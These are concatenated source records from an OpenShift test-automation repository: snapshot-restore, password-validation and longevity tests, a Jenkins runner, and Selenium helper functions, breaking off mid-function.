common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n\n self.add_step(\"Re-enable embeded mysql for this app\",\n common.embed,\n function_parameters=[self.app_name, \n \"add-mysql-5.1\", \n self.user_email, \n self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Restore app from snapshot\",\n \"rhc snapshot restore %s -f %s -l %s -p '%s' %s\" \n %(self.app_name,\n \"%s.tar.gz\"%(self.app_name),\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n self.add_step(\"Stop the app\",\n common.stop_app,\n function_parameters=[self.app_name, self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Start the app\",\n common.start_app,\n function_parameters=[self.app_name, self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Access app's URL to check mysql data is restored\",\n \"curl -H 'Pragma: no-cache' __OUTPUT__[2]/%s\" %(self.url_path3),\n expect_return=0,\n expect_str = [\"Welcome\", self.key_string1],\n try_interval=12,\n try_count=10)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMysqlDataToNewApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5745164752006531, "alphanum_fraction": 0.5779294371604919, "avg_line_length": 27.819671630859375, "blob_id": "03409bcc4fe6b69063f048ef7ebfdd8614f2b2f1", "content_id": "75ee7482e35c7946c00e219c62e31a2cfd0d16e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1758, "license_type": "no_license", "max_line_length": 76, "num_lines": 61, "path": "/automation/runwithjenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport sys\nfrom os.path import join, exists\n\nfrom robot import run\n\nimport hta2\nfrom hta2.utils import copy\nfrom hta2.run import run_project\nfrom hta2.core.exceptions import UsageError\nfrom hta2.core.management.base import BaseCommand\nfrom hta2.core.management.paramshandler import ParamsHandler\n\n\nclass Command(BaseCommand):\n\n def syntax(self):\n return \"[-option]\"\n\n def short_desc(self):\n return \"Run project with jenjins\"\n\n def long_desc(self):\n return \"Run project with jenkins. \\n \\\n If y don't want to wrirte result to tcms, add --notcms. \\n \\\n Default is writting.\"\n\n def add_options(self, parser):\n parser.add_option('--notcms', action='store_true', dest='no_tcms',\n help='Whether write result to tcms in real-time. \\\n default is writting.')\n\n def run(self, args, opts):\n params = ParamsHandler()\n log_level = 'DEBUG'\n noncritical = ['noncritical']\n exclude_tag = ['notready']\n cases_path = params.cases_path\n listener = params.tcms_listener\n case_tags = params.case_tags\n output_dir = params.result_path\n if not opts.no_tcms:\n run(cases_path,\n loglevel=log_level,\n include=case_tags,\n exclude=exclude_tag,\n noncritical=noncritical,\n outputdir=output_dir,\n listener=listener)\n else:\n run(cases_path,\n loglevel=log_level,\n include=case_tags,\n exclude=exclude_tag,\n outputdir=output_dir,\n noncritical=noncritical)\n\n\nif __name__ == '__main__':\n pass\n" }, { "alpha_fraction": 0.6568024754524231, "alphanum_fraction": 0.6656417846679688, "avg_line_length": 39.03076934814453, "blob_id": "832a16ce44f4f260eb0e2e8216dacac057004221", "content_id": "417f0268325eb6aa5fbf3bf18b1b57eb824b409d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2602, "license_type": "no_license", "max_line_length": 132, "num_lines": 65, "path": "/automation/open/testmodules/UI/web/US1797_135715.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135715(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.confirm_link=self.cfg.confirm_url_express\n\n \n def test_u_s1797135715(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n\n baseutils.go_to_account_page(self)\n\n driver.find_element_by_link_text(\"Change password...\").click()\n baseutils.wait_element_present_by_id(self, \"web_user_password\")\n\n driver.find_element_by_id(\"web_user_old_password\").clear()\n driver.find_element_by_id(\"web_user_old_password\").send_keys(self.cfg.password)\n\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(\"abcabc\")\n\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"abcabb\")\n driver.find_element_by_id(\"web_user_submit\").click()\n time.sleep(5)\n baseutils.assert_text_equal_by_xpath(self, \"Passwords must match\", \"id('web_user_password_input')/div/p\")\n \n#short passwd...\n illegal_passwd=\"aaa\"\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(illegal_passwd) #backslash\n\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(illegal_passwd)\n driver.find_element_by_id(\"web_user_submit\").click()\n time.sleep(5)\n baseutils.assert_text_equal_by_xpath(self, \"Passwords must be at least 6 characters\", \"id('web_user_password_input')/div/p\")\n\n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5886287689208984, "alphanum_fraction": 0.6061872839927673, "avg_line_length": 28.899999618530273, "blob_id": "e4fe7248f3c0b90e9376f5ce9fccfdd1a3659b99", "content_id": "123cb76e5aaf629b698ff18497a8f98d0c2c00c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 81, "num_lines": 40, "path": "/automation/open/Longevity/10k_stopped_app_create/10K_stopped_app_create.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\napp_type=$1\npwd=$(pwd)\ntime=$(date +%Y%m%d-%H%M%S)\nlog=\"$pwd/${0%.*}_${time}.log\"\n\n#no parameter\napp_create_all()\n{\n\t\tfor app in $app_types;do\n\t\t\trun app_create $app\n \t #run url_check $app_name\n\t\t\trun rhc app stop $app_name -p$passwd --timeout 360\n\t\t\techo \"$app_name\t\t$cartridge_type\t\t\tnoscalable\t\t$(date +%Y%m%d-%H%M%S)\" >> $log\n\n\t\t\tif [ \"$app\" = \"diy-0.1\" ];then\n\t\t\t\techo \"Diy is cann't support scalable !\"\n\t\t\t\tcontinue\n\t\t\tfi\n\n\t\t\trun app_create $app -s\n \t\t #run url_check $app_name\n\t\t\trun rhc app stop $app_name -p$passwd --timeout 360\n\t\t\techo \"$app_name\t\t$cartridge_type\t\t\tscalable\t\t\t$(date +%Y%m%d-%H%M%S)\" >> $log\n\t\tdone\n\techo_yellow \"Already have $(($app_number+1)) applications\"\n}\n\n[ -f function.sh ] || ln -s $(pwd)/../function.sh function.sh\n[ -f common_func.sh ] || ln -s $(pwd)/../common_func.sh common_func.sh\n[ -f AutoCreate.cfg ] || ln -s $(pwd)/../AutoCreate.cfg AutoCreate.cfg\n[ -d testdir ] && rm -rf testdir/* || mkdir testdir\n. ./function.sh\ncd testdir\nrun set_running_parameter\nrhc domain show -predhat|grep jenkins-1.4 > /dev/null\n[ $? -ne 0 ] && run app_create jenkins-1.4\nwhile (($app_number < 10000));do\n run app_create_all\ndone\n" }, { "alpha_fraction": 0.6963136792182922, "alphanum_fraction": 0.7020599842071533, "avg_line_length": 39.10144805908203, "blob_id": "a401a16a197fe9d780175265be6ebafdf90de1ed", "content_id": "7e31a35d7cb9290518efac4e4d7b04612e22a91e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27670, "license_type": "no_license", "max_line_length": 122, "num_lines": 690, "path": "/automation/open/testmodules/UI/web/baseutils.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n#from selenium.webdriver.opera.opera_binary import OperaBinary\n#from selenium.webdriver.chrome.chrome_binary import ChromeBinary\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nimport unittest, time, re\nimport logging\nfrom config import Config\nimport ConfigParser\nimport string\nimport random\nimport os\nimport sys\n\n\nInvalid_input=[\"@##\", u\"\\u2013xx\", \"$ $\", u\"\\u0040x\"]\n\n\nlogging.basicConfig(filename='seleniumtest.log',format='%(levelname)s:%(message)s',level=logging.DEBUG)\nurl=\"https://stg.openshift.redhat.com/\"\n#logging.info('So should this')\n#logging.warning('And this, too')\n\ncfg = Config()\n\ndef initiate(classself):\n cfg = Config()\n tmp_browser=cfg.browser.strip().lower()\n if tmp_browser == 'firefox':\n if len(cfg.proxy) == 0:\n classself.driver = webdriver.Firefox()\n if cfg.browserpath != '0':\n classself.binary = FirefoxBinary(cfg.browserpath)\n classself.driver = webdriver.Firefox(classself.binary)\n else:\n classself.profile=webdriver.FirefoxProfile()\n classself.profile.set_preference(\"network.proxy.type\", 1)\n classself.profile.set_preference(\"network.proxy.http\", cfg.proxy)\n classself.profile.set_preference(\"network.proxy.http_port\", 3128)\n classself.profile.set_preference(\"network.proxy.ssl\", cfg.proxy)\n classself.profile.set_preference(\"network.proxy.ssl_port\", 3128)\n classself.driver = webdriver.Firefox(classself.profile)\n if cfg.browserpath !='0':\n classself.binary = FirefoxBinary(cfg.browserpath)\n classself.driver = webdriver.Firefox(classself.profile,classself.binary)\n elif tmp_browser == 'ie':\n classself.driver = webdriver.Ie()\n elif tmp_browser == 'opera':\n classself.driver = webdriver.Opera()\n elif tmp_browser == 'android':\n classself.driver = webdriver.Android()\n elif tmp_browser == 'chrome':\n classself.driver = webdriver.Chrome()\n else:\n logging.warning(tmp_browser+'is not supported')\n #TODO:classself.warn(\"ECHOOOOO\")\n \n if cfg.browserpath != '0' and tmp_browser == 'chrome':\n classself.driver = webdriver.Chrome(executable_path=cfg.browserpath)\n classself.driver.implicitly_wait(20)\n classself.base_url = cfg.url\n classself.verificationErrors = []\n classself.confirm_url_express = cfg.confirm_url_express\n classself.cfg = cfg\n# basedriver=classself.driver\n\n\ndef is_element_present(classself, how, what):\n try: classself.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n\ndef assert_contain_text_by_id(classself,text,id_name):\n _retry=120\n while(_retry>0):\n _retry=_retry-1\n time.sleep(1)\n try:\n # if classself.driver.find_element_by_id(id_name).text.find(text) != -1 : break\n if text in classself.driver.find_element_by_id(id_name).text : break\n except: pass\n time.sleep(1)\n else:classself.fail(\"the text is not displayed yet\")\n\ndef assert_contain_text_by_css(classself,text,css_name):\n _retry=120\n while(_retry>0):\n _retry=_retry-1\n time.sleep(1)\n try:\n# if classself.driver.find_element_by_css(css_name).text.find(text) != -1 : break\n if text in classself.driver.find_element_by_css(css_name).text : break\n except: pass\n time.sleep(1)\n else:classself.fail(\"the text is not displayed yet\")\n\ndef assert_contain_text_by_xpath(classself,text,xpath):\n _retry=60\n while(_retry>0):\n _retry=_retry-1\n time.sleep(1)\n try:\n # if classself.driver.find_element_by_xpath(xpath).text.find(text) != -1 : break\n if text in classself.driver.find_element_by_xpath(xpath).text : break\n except: pass\n time.sleep(1)\n else:classself.fail(\"the text is not displayed yet\")\n\n\ndef is_element_displayed(classself,how,what):\n try:classself.assertTrue(classself.driver.find_element(by=how,value=what).is_displayed(),what+\" is not displayed\")\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_element_hidden(classself,how,what):\n try:classself.assertFalse(classself.driver.find_element(by=how,value=what).is_displayed())\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef wait_element_not_displayed_by_id(classself,id_name):\n try:\n WebDriverWait(classself.driver,120).until(classself.driver.find_element_by_id(id_name))\n classself.assertTrue(classself.driver.find_element_by_id(id_name).is_displayed())\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_displayed(classself,text,css):\n try:\n WebDriverWait(classself.driver, 100).until(classself.driver.find_element_by_css_selector(css))\n classself.assertTrue( text == classself.driver.find_element_by_css_selector(css).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_displayed_by_id(classself,text,id_name):\n try:\n WebDriverWait(classself.driver, 100).until(classself.driver.find_element_by_id(id_name))\n classself.assertTrue( text == classself.driver.find_element_by_id(id_name).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\n\ndef check_title(classself,title):\n time.sleep(5)\n for i in range(60):\n try:\n if title == classself.driver.title: break\n except: pass\n time.sleep(1)\n else:classself.fail(\"time out,%s is not equal %s\" %(title,classself.driver.title));\n\n\ndef assert_element_present_by_css(classself,css):\n try: classself.assertTrue(is_element_present(classself,By.CSS_SELECTOR,css))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_not_present_by_css(classself,css):\n try: classself.assertFalse(is_element_present(classself,By.CSS_SELECTOR,css))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_id(classself,idname):\n try: classself.assertTrue(is_element_present(classself,By.ID,idname))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_not_present_by_id(classself,idname):\n try: classself.assertFalse(is_element_present(classself,By.ID,idname))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_xpath(classself,xpath):\n try: classself.assertTrue(is_element_present(classself,By.XPATH,xpath))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_link_text(classself,link_text):\n try: classself.assertTrue(is_element_present(classself,By.LINK_TEXT,link_text))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_partial_link_text(classself,partial_link_text):\n try: classself.assertTrue(is_element_present(classself,By.PARTIAL_LINK_TEXT ,partial_link_text))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_element_present_by_name(classself,name):\n try: classself.assertTrue(is_element_present(classself,By.NAME ,name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_class_name(classself,class_name):\n try: classself.assertTrue(is_element_present(classself,By.CLASS_NAME ,class_name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_tag_name(classself,tag_name):\n try: classself.assertTrue(is_element_present(classself,By.TAG_NAME ,tag_name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_element_present(classself,how,what):\n try: classself.assertTrue(is_element_present(classself,how ,what))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_equal_by_css(classself,text,css,msg=None):\n try: classself.assertEqual(text,classself.driver.find_element_by_css_selector(css).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_text_equal_by_xpath(classself,text,xpath):\n try: classself.assertEqual(text,classself.driver.find_element_by_xpath(xpath).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_equal_by_partial_link_text(classself,text,partial_link_text):\n try: classself.assertEqual(text,classself.driver.find_element_by_partial_link_text(partial_link_text).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_text_equal_by_id(classself,text,id_name):\n try: classself.assertEqual(text,classself.driver.find_element_by_id(id_name).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_regexp_match_by_css(classself,text,css):\n try: classself.assertRegexpMatches(classself.driver.find_element_by_css_selector(css).text,text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_regexp_match_by_xpath(classself, text, xpath):\n try: classself.assertRegexpMatches(classself.driver.find_element_by_xpath(xpath).text,text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_value_equal_by_id(classself,value,id_name):\n try: classself.assertEqual(value,classself.driver.find_element_by_id(id_name).get_attribute(\"value\"))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_equal_by_css(classself,text,css):\n for i in range(60):\n try:\n if text == classself.driver.find_element_by_css_selector(css).text: break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not equal to %s\" %(text,classself.driver.find_element_by_css_selector(css).text))\n\ndef is_text_equal_by_xpath(classself,text,xpath):\n for i in range(60):\n try:\n if text == classself.driver.find_element_by_xpath(xpath).text: break\n except: pass\n time.sleep(1)\n else:classself.fail(\"time out,%s is not equal to %s\" %(text,classself.driver.find_element_by_xpath(xpath).text))\n\n\n\n \n\n# for i in range(240):\n# try:\n# if not classself.driver.find_element_by_id(id_name).is_displayed(): break\n# except: pass\n# time.sleep(1)\n# else: classself.fail(\"time out\")\n\n#def wait_element_not_displayed_by_id(classself,id_name):\n # wait_element_not_present(classself,By.ID,id_name)\n \n\ndef wait_element_present_by_xpath(classself,xpath):\n for i in range(60):\n try:\n if is_element_present(classself,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(xpath))\n\ndef wait_element_not_present_by_xpath(classself,xpath):\n for i in range(60):\n try:\n if not is_element_present(classself,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is present\"%(xpath))\n\ndef wait_element_present_by_css(classself,css):\n for i in range(60):\n try:\n if is_element_present(classself,By.CSS_SELECTOR, css): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(css))\n\ndef wait_element_present_by_id(classself,idname):\n for i in range(60):\n try:\n if is_element_present(classself,By.ID, idname): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(idname))\n\ndef wait_element_present_by_class(classself,class_name):\n for i in range(60):\n try:\n if is_element_present(classself,By.CLASS_NAME,class_name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(class_name))\n\ndef wait_element_present_by_name(classself,name):\n for i in range(60):\n try:\n if is_element_present(classself,By.NAME,name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(name))\n\ndef wait_element_present_by_link_text(classself,name):\n for i in range(60):\n try:\n if is_element_present(classself,By.LINK_TEXT,name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(name))\n\n\ndef click_element_by_css(classself,css):\n wait_element_present_by_css(classself,css)\n classself.driver.find_element_by_css_selector(css).click()\n\ndef click_element_by_id(classself,id_name):\n wait_element_present_by_id(classself,id_name)\n classself.driver.find_element_by_id(id_name).click()\n\ndef click_element_by_xpath(classself,xpath):\n wait_element_present_by_xpath(classself,xpath)\n classself.driver.find_element_by_xpath(xpath).click()\n\ndef click_element_by_xpath_wait(classself,xpath):\n wait_element_present_by_xpath(classself,xpath)\n classself.driver.find_element_by_xpath(xpath).click()\n time.sleep(8)\n\ndef click_element_by_link_text(classself,link_text):\n wait_element_present_by_link_text(classself,link_text)\n classself.driver.find_element_by_link_text(link_text).click()\n \n\ndef click_element_by_class(classself,class_name):\n wait_element_present_by_class(classself,class_name)\n classself.driver.find_element_by_class_name(class_name).click()\n\n\ndef click_element_by_css_no_wait(classself,css):\n classself.driver.find_element_by_css_selector(css).click()\n\ndef click_element_by_id_no_wait(classself,id_name):\n classself.driver.find_element_by_id(id_name).click()\n\ndef click_element_by_xpath_no_wait(classself,xpath):\n classself.driver.find_element_by_xpath(xpath).click()\n\ndef click_element_by_partial_link_text_no_wait(classself,partial_link_text):\n classself.driver.find_element_by_partial_link_text(partial_link_text).click()\n\ndef go_to_home(classself):\n# basedriver=classself.driver\n classself.driver.get(classself.base_url+\"/app/\")\n# time.sleep(10)\n check_title(classself,\"OpenShift by Red Hat\")\n \n\n#obsolete:\ndef go_to_express(classself):\n pass\n express_page=classself.base_url+\"/app/express\"\n classself.driver.get(express_page)\n '''\n# go_to_home(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Express\")\n\ndef go_to_express_quick_start(classself):\n quick_start=classself.base_url+\"/app/express#quickstart\"\n classself.driver.get(quick_start)\n\n\ndef go_to_flex(classself):\n# go_to_home(classself)\n flex_page=classself.base_url+\"/app/flex\"\n classself.driver.get(flex_page)\n '''\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n check_title(classself,\"OpenShift by Red Hat | Express\")\n scroll_bar(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Flex')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Flex\")\n\n\ndef go_to_power(classself):\n# go_to_home(classself)\n power_page=classself.base_url+\"/app/power\"\n classself.driver.get(power_page)\n '''\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n check_title(classself,\"OpenShift by Red Hat | Express\")\n scroll_bar(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Power')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Power\")\n\ndef go_to_signin(classself):\n classself.driver.get(classself.base_url+\"/app/login\")\n #click_element_by_class(classself,\"sign_in\")\n # time.sleep(5)\n #click_element_by_link_text(classself,\"Sign in\")\n #is_element_displayed(classself,By.ID,\"login-form\")\n #is_element_displayed(classself,By.ID,\"login_input\")\n\n\ndef go_to_signup(classself):\n # scroll_bar(classself)\n #signup_page=classself.base_url+\"/app/user/new/express\"\n go_to_home(classself)\n scroll_to_bottom(classself)\n click_element_by_xpath(classself,\".//*[@id='bottom_signup']/div/a\")\n time.sleep(2)\n if not is_element_displayed(classself,By.ID,\"signup\"):\n click_element_by_xpath(classself,\".//*[@id='bottom_signup']/div/a\")\n #click_element_by_link_text(classself,\"Sign up and try it\")\n #click_element_by_xpath(classself,\".//*[@id='opener']/div/a\")\n# click_element_by_css(classself,\"a.button.sign_up\")\n is_element_displayed(classself,By.ID,\"signup\")\n\n\n\ndef go_to_console(classself):\n classself.driver.get(classself.base_url+\"/app/console/applications\")\n check_title(classself,\"OpenShift by Red Hat\")\n\ndef go_to_express_console(classself):\n go_to_console(classself)\n# basedriver=classself.driver\n pass\n #classself.driver.get(classself.base_url+\"/app/console/applications\")\n# time.sleep(10)\n #check_title(classself,\"OpenShift by Red Hat\")\n\n\ndef go_to_partners(classself):\n partner_page=classself.base_url+\"/app/partners\"\n classself.driver.get(partner_page)\n check_title(classself,\"OpenShift by Red Hat | Meet Our Partners\")\n\ndef go_to_legal(classself):\n legal_page=classself.base_url+\"/app/legal\"\n classself.driver.get(legal_page)\n check_title(classself,\"OpenShift by Red Hat | Terms and Conditions\")\n classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n\n\ndef go_to_platformoverview(classself):\n go_to_home(classself)\n click_element_by_link_text(classself,\"Platform Overview\")\n check_title(classself,\"OpenShift by Red Hat | Cloud Platform\")\n \ndef go_back(classself):\n classself.driver.back()\n time.sleep(5)\n\ndef input_by_id(classself,id_name,input_content):\n classself.driver.find_element_by_id(id_name).clear()\n classself.driver.find_element_by_id(id_name).send_keys(input_content)\n\n\ndef input_by_name(classself,name,input_content):\n classself.driver.find_element_by_name(name).clear()\n classself.driver.find_element_by_name(name).send_keys(input_content)\n\ndef input_by_xpath(classself,xpath,input_content):\n classself.driver.find_element_by_xpath(xpath).clear()\n classself.driver.find_element_by_xpath(xpath).send_keys(input_content)\n\n\ndef set_captcha(classself):\n classself.driver.execute_script(\"\"\"\n var input_ele = window.document.createElement('input');\n input_ele.setAttribute('type','hidden');\n input_ele.setAttribute('name','captcha_secret');\n input_ele.setAttribute('value','zvw5LiixMB0I4mjk06aR');\n var dialog = window.document.getElementById('signup');\n dialog.getElementsByTagName('form')[0].appendChild(input_ele);\"\"\"\n )\n\n\n\ndef register_a_user(classself,username,password,confirmpassword=\"0\",captcha=False):\n if confirmpassword == \"0\":\n confirmpassword =password\n #wait_element_present_by_id(classself,\"web_user_email_address\")\n input_by_id(classself,\"web_user_email_address\",username)\n input_by_id(classself,\"web_user_password\",password)\n input_by_id(classself,\"web_user_password_confirmation\",confirmpassword)\n if captcha:\n set_captcha(classself)\n classself.driver.find_element_by_id(\"web_user_submit\").click()\n \n\ndef login(classself, username, password):\n classself.driver.get(classself.base_url+\"/app/login\")\n time.sleep(10)\n wait_element_present_by_id(classself, \"web_user_rhlogin\")\n classself.driver.find_element_by_id(\"web_user_rhlogin\").clear()\n classself.driver.find_element_by_id(\"web_user_rhlogin\").send_keys(username)\n classself.driver.find_element_by_id(\"web_user_password\").clear()\n classself.driver.find_element_by_id(\"web_user_password\").send_keys(password)\n classself.driver.find_element_by_id(\"web_user_submit\").click()\n time.sleep(15)\n wait_element_present_by_id(classself, \"utility-nav\")\n assert_text_equal_by_xpath(classself, \"Sign Out\", \"id('utility-nav')/li[3]/a\")\n\ndef login_by_form(classself,username,password):\n wait_element_present_by_xpath(classself,\"//div[@id='login-form']/form/label/input\")\n input_by_xpath(classself,\"//div[@id='login-form']/form/label/input\",username)\n input_by_xpath(classself,\"//div[@id='login-form']/form/label[2]/input\",password)\n classself.driver.find_element_by_css_selector(\"input.button\").click()\n time.sleep(5)\n\ndef login_by_window(classself,username,password):\n wait_element_present_by_xpath(classself,\"//div[@id='login-form']/form/label/input\")\n input_by_xpath(classself,\"//div[@id='login-form']/form/label/input\",username)\n input_by_xpath(classself,\"//div[@id='login-form']/form/label[2]/input\",password)\n classself.driver.find_element_by_css_selector(\"form > input.button\").click()\n time.sleep(5)\n\ndef reset_password(classself,user):\n go_to_home(classself)\n go_to_signin(classself)\n click_element_by_xpath(classself,\"//*[@id='lost_password']/p/a\")\n# click_element_by_css(classself,\"a.password_reset.more\")\n time.sleep(2)\n assert_text_equal_by_css(classself,\"Reset your password\",\"#reset_password > header > h1\")\n input_by_id(classself,\"email_input\",user)\n click_element_by_css_no_wait(classself,\"#password-reset-form > form > input.button\")\n \ndef change_password(classself,user,oldpwd,oldpwd2,newpwd,newpwdcfm):\n go_to_home(classself)\n time.sleep(4)\n go_to_signin(classself)\n login(classself,user,oldpwd)\n go_to_express_console(classself)\n scroll_bar(classself)\n try:click_element_by_link_text(classself,\"Click here to change your password\")\n except:click_element_by_css(classself,\"a.change_password\")\n time.sleep(3)\n assert_text_equal_by_css(classself,\"Change your password\",\"#change_password > header > h1\")\n input_by_name(classself,\"old_password\",oldpwd2)\n input_by_id(classself,\"password\",newpwd)\n input_by_name(classself,\"password_confirmation\",newpwdcfm)\n click_element_by_css(classself,\"#change-password-form > form > input.button\")\n time.sleep(1)\n if classself.driver.current_url not in [classself.base_url+\"/app/dashboard\",classself.base_url+\"/app/control_panel\"]:\n classself.fail(\"fail,it goes wrong location\")\n \n\ndef scroll_bar(classself):\n classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(5)\n classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n time.sleep(10)\n\ndef scroll_by(classself):\n classself.driver.execute_script(\"window.scrollBy(-100,-100);\")\n\ndef scroll_to_upper(classself):\n classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n\ndef scroll_to_middle(classself):\n classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n\n\ndef scroll_to_bottom(classself):\n classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\ndef generate_greetings(username):\n _greetings=\"Greetings, \" + username \n _greetings+=\"!\"\n return _greetings\n\ndef logout(classself):\n assert_element_present_by_link_text(classself,\"Sign Out\")\n click_element_by_link_text(classself,\"Sign Out\")\n wait_element_present_by_link_text(classself,\"SIGN IN TO MANAGE YOUR APPS\")\n assert_element_present_by_link_text(classself, \"SIGN IN TO MANAGE YOUR APPS\")\n\n\ndef wait_for_ajax(classself,timeout = 10):\n time.seep(timeout)\n #WebDriverWait(classself.driver, timeout).until(classself.driver.execute_script(return jQuery.active == 0;))\n\ndef update_config_file(section,name,value):\n configparse = ConfigParser.RawConfigParser()\n configparse.read('config.cfg')\n configparse.set(section,name,value)\n with open('config.cfg', 'wb') as configfile:\n configparse.write(configfile)\n\ndef get_random_str(length=12):\n chars = string.ascii_letters + string.digits\n return \"\".join(random.choice(chars) for x in range(length))\n\ndef go_to_account_page(classself):\n classself.driver.get(classself.base_url+\"/app/account\")\n wait_element_present_by_link_text(classself, \"Change password...\")\n classself.assertEqual(\"OpenShift by Red Hat | My Account\", classself.driver.title)\n\ndef setup_domain(classself, domain_name=None):\n driver = classself.driver\n if domain_name == None:\n domain_name = get_random_str(16)\n go_to_account_page(classself)\n if is_element_present(classself, By.ID, \"domain_submit\"):\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(domain_name)\n else:\n driver.find_element_by_link_text(\"Change your namespace...\").click()\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(domain_name)\n\n driver.find_element_by_id(\"domain_submit\").click()\n wait_element_present_by_link_text(classself, \"Change your namespace...\")\n\n\ndef setup_default_sshkey(classself):\n go_to_account_page(classself)\n driver = classself.driver\n sshkey = \"ssh-rsa 